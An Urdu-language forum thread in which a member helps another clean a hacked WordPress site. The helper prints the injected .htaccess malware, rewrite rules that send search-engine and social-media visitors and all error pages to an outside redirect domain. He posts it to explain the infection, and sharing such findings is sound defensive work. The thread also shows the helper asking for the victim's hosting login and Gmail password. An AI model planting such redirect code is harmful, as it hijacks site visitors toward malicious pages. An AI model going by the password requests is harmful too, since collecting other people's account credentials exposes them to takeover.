Page 1 of 1

میری ورد پریس سائٹ پر وائرس کا حملہ کوئی حل بتادے .فریادی پھ

Posted: Sat Mar 24, 2012 4:34 am
by مدرس
میری ویب سائٹ پر وائرس کا حملہ ھوگیا ھے میں نے وہرد پریس کی تمام فائل ڈاونلوڈ کرکے اسکین کی تو پتہ چلا کہ وائرس ڈیٹا بیس میں ھے پی ایچ پی فائل میں کوئی وائرس نھیں تھا

بڑا مشکور رہوں گا اگر کوئی صاحب حل کر دیں کو ئی سے مرا بلا شرم وحیائ میری مراد چاند بابو ہیں .
http://darseislam.com/
پلیز پلیز پلیز پلیز

Re: میری ورد پریس سائٹ پر وائرس کا حملہ کوئی حل بتادے .فریاد

Posted: Sat Mar 24, 2012 9:05 am
by بلال احمد
مدرس بھائی آپکو اردونامہ میں خوش آمدید کہتے ہیں c;om;pu;te;r;beat c;om;pu;te;r;beat

Re: میری ورد پریس سائٹ پر وائرس کا حملہ کوئی حل بتادے .فریاد

Posted: Sat Mar 24, 2012 1:13 pm
by محمد شعیب
مدرس صاحب ! آپ

یہ لنک

دیکھیں. یہاں اس موضوع پر بحث ہوئی ہے.

Re: میری ورد پریس سائٹ پر وائرس کا حملہ کوئی حل بتادے .فریاد

Posted: Sat Mar 24, 2012 6:01 pm
by چاند بابو
مدرس wrote:میری ویب سائٹ پر وائرس کا حملہ ھوگیا ھے میں نے وہرد پریس کی تمام فائل ڈاونلوڈ کرکے اسکین کی تو پتہ چلا کہ وائرس ڈیٹا بیس میں ھے پی ایچ پی فائل میں کوئی وائرس نھیں تھا

بڑا مشکور رہوں گا اگر کوئی صاحب حل کر دیں کو ئی سے مرا بلا شرم وحیائ میری مراد چاند بابو ہیں .
http://darseislam.com/
پلیز پلیز پلیز پلیز

ہاہاہاہاہا
آجکل لگتا ہے چاند بابو کی شامت آئی ہوئی ہے.
مدرس بھیا یہ سزا ملی ہے آپ کو اتنی مدت غیرحاضر رہنے کی.
بہرحال آپ اپنی سائیٹ کا لاگ ان اور ہوسٹنگ کی تفصیلات مجھے ذاتی پیغام میں روانہ کیجئے میں دیکھتا ہوں.

Re: میری ورد پریس سائٹ پر وائرس کا حملہ کوئی حل بتادے .فریاد

Posted: Wed Mar 28, 2012 9:25 pm
by چاند بابو
لیجئے جناب آپ کی سائیٹ کی HTACESS فائلز میں Melaware تھا جو آپ کی سائیٹ کو کہیں اور ری ڈائریکٹ کر رہا تھا.
اب وہ فائلز میں نے حذف کر دی ہیں اور آپ کی سائیٹ بالکل صاف ہے انشااللہ.
مگر اب دوبارہ گوگل کروم پر سائیٹ کھلوانے کے لئے آپ کو اپنے گوگل ویب ماسٹر اکاونٹ میں جانا ہو گا.
اگر آپ کی سائیٹ وہاں ایڈ ہے تو ٹھیک ورنہ نیا اکاونٹ بنا کر اسے ایڈ کریں اور پھر وہاں اسے Review کے لئے پیش کر دیں.
اگر یہ کام کر سکیں تو ٹھیک وگرنہ مجھے اپنا جی میل ایڈریس اور پاسورڈ بھیج دیں میں یہ کام کر دوں گا.

Re: میری ورد پریس سائٹ پر وائرس کا حملہ کوئی حل بتادے .فریاد

Posted: Fri Mar 30, 2012 10:32 am
by چاند بابو
السلام علیکم

لیجئے مدرس بھیا آپ کے ویب ماسٹر ٹولز میں سے بھی کام کر دیا ہے. الحمداللہ آپ کا مسئلہ مکمل طور پر حل ہو چکا ہے آپ کی سائیٹ اب نا صرف کسی بھی قسم کے وائرس وغیرہ سے پاک ہے بلکہ گوگل نے بھی اسے محفوظ تصور کر کے اسے اپنی بلاک لسٹ سے نکال دیا ہے.
ایک کام کیجئے اپنی سائیٹ کے ایڈمن کنٹرول پینل، اپنی ہوسٹنگ اور باقی تمام اشیاء کے پاسورڈ تبدیل کر دیجئے اور انہیں بہت سخت کر دیں اس کے لئے آپ نمبرز اورالفاظ کے ساتھ ساتھ سمبلز کا کمبینیشن استعمال کریں یعنی
&*dArsEisLam7542#887
اس قسم کا پاسورڈ استعمال کریں گے تو آپ کی سائیٹ دوبارہ ہیک ہونے کے چانسز بہت کم ہیں.

Re: میری ورد پریس سائٹ پر وائرس کا حملہ کوئی حل بتادے .فریاد

Posted: Fri Mar 30, 2012 1:19 pm
by شازل
چاند بابو wrote:السلام علیکم

مدرس بھیا *dArsEisLam7542#887& اب یہ پاس ورڈ نہ لگا دیجئے گا

Re: میری ورد پریس سائٹ پر وائرس کا حملہ کوئی حل بتادے .فریاد

Posted: Sat Mar 31, 2012 1:20 am
by چاند بابو
ہاہاہاہاہاہاہاہا

استاد جی تسی وی مزاخ کردے او۔
مرضی ہے شازل بھیا آپ کی مدرس بھیا اتنے بھی گئے گزرے نہیں ہیں۔
یہ اور بات ہے کہ ان کی سائیٹ پر اٹیک ہو گیا۔
آپ کو شاید یاد ہو گا اردونامہ پر کچھ ماہ پہلے اس سے بھی بڑا اٹیک ہوا تھا اور ہماری تو ساری سائیٹ ہی ختم ہو گئی تھی یہ تو پھر تین چار فائلز ہی حذف کرنی پڑی ہیں۔
یہ ہو جاتا ہے کبھی اپنی غفلت سے کبھی ہوسٹنگ کمپنی کی غفلت سے تو کبھی آپ کی ہوسٹنگ پر چلنے والی کسی اور سائیٹ کی وجہ سے۔

Re: میری ورد پریس سائٹ پر وائرس کا حملہ کوئی حل بتادے .فریاد

Posted: Sat Mar 31, 2012 7:40 pm
by شازل
کچھ اس کوڈ کے بارے میں تفصیل پتا چل سکتی ہے کہ یہ کس قسم کا ہوتا ہے

Re: میری ورد پریس سائٹ پر وائرس کا حملہ کوئی حل بتادے .فریاد

Posted: Tue Apr 03, 2012 6:27 pm
by چاند بابو
جی بالکل شازل بھیا کوڈ نیچے دیا گیا ہے.
یہ کوڈ آپ کی htaccess فائل کو متاثر کرتا ہے اور سائیٹ پر موجود جتنی بھی htaccess فائلز ہوتی ہیں ان میں یہ کوڈ داخل ہو جاتا ہے اور آپ کی سائیٹ کو کسی ایسی سائیٹ کی طرف ری ڈائریکٹ کردیتا ہے جو اس وائرس سے متاثر ہو.
دراصل یہ خود وائرس نہیں ہے بلکہ آپ کی سائیٹ کو ایک وائرس والی سائیٹ سے منسلک کرتا ہے.

کوڈ یہ ہے.

Code: Select all

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
</IfModule>

ErrorDocument 400 http://massage-pool.ru/mysave/index.php
ErrorDocument 401 http://massage-pool.ru/mysave/index.php
ErrorDocument 403 http://massage-pool.ru/mysave/index.php
ErrorDocument 404 http://massage-pool.ru/mysave/index.php
ErrorDocument 500 http://massage-pool.ru/mysave/index.php
اس سے کچھ مختلف بھی ہو سکتا ہے مگر ری رائیٹ رولز یہی استعمال ہوتے ہیں.

اس کے علاوہ ویب سائیٹ کا جو ایڈریس یہاں موجود ہے وہ ہو سکتا ہے اور کوئی ہو.

Re: میری ورد پریس سائٹ پر وائرس کا حملہ کوئی حل بتادے .فریاد

Posted: Fri Jun 22, 2012 6:25 pm
by مدرس
کا فی دنوں کے بعد جزاک اللہ خیرا

Re: میری ورد پریس سائٹ پر وائرس کا حملہ کوئی حل بتادے .فریاد

Posted: Fri Jun 22, 2012 6:26 pm
by مدرس
شازل wrote:
چاند بابو wrote:السلام علیکم

لیجئے مدرس بھیا آپ کے ویب ماسٹر ٹولز میں سے بھی کام کر دیا ہے. الحمداللہ آپ کا مسئلہ مکمل طور پر حل ہو چکا ہے آپ کی سائیٹ اب نا صرف کسی بھی قسم کے وائرس وغیرہ سے پاک ہے بلکہ گوگل نے بھی اسے محفوظ تصور کر کے اسے اپنی بلاک لسٹ سے نکال دیا ہے.
ایک کام کیجئے اپنی سائیٹ کے ایڈمن کنٹرول پینل، اپنی ہوسٹنگ اور باقی تمام اشیاء کے پاسورڈ تبدیل کر دیجئے اور انہیں بہت سخت کر دیں اس کے لئے آپ نمبرز اورالفاظ کے ساتھ ساتھ سمبلز کا کمبینیشن استعمال کریں یعنی
&*dArsEisLam7542#887
اس قسم کا پاسورڈ استعمال کریں گے تو آپ کی سائیٹ دوبارہ ہیک ہونے کے چانسز بہت کم ہیں.

مدرس بھیا *dArsEisLam7542#887& اب یہ پاس ورڈ نہ لگا دیجئے گا
کیا مجھے ........... سمجھ لیا ھے :lol:

Re: میری ورد پریس سائٹ پر وائرس کا حملہ کوئی حل بتادے .فریاد

Posted: Sat Jun 23, 2012 12:16 am
by چاند بابو
جی جی ایسی ہی کچھ بات ہے جو بندہ اپنا پاسورڈ بہتر تب کر رہا ہے جب اس کی سائیٹ ایک بار ہیک ہو چکی ہے تو اسے تو ۔۔۔۔۔۔۔۔۔۔۔۔۔۔ ایسے سمجھنا ہی چاہئے نا۔

Re: میری ورد پریس سائٹ پر وائرس کا حملہ کوئی حل بتادے .فریاد

Posted: Fri Jun 29, 2012 3:55 pm
by عطاء رفیع
جزاک اللہ چاند بابوبھائی مفید معلومات ہیں.

Re: میری ورد پریس سائٹ پر وائرس کا حملہ کوئی حل بتادے .فریاد

Posted: Fri Jun 29, 2012 6:25 pm
by چاند بابو
پسند کرنے کا بہت بہت شکریہ عطاء رفیع بھیا.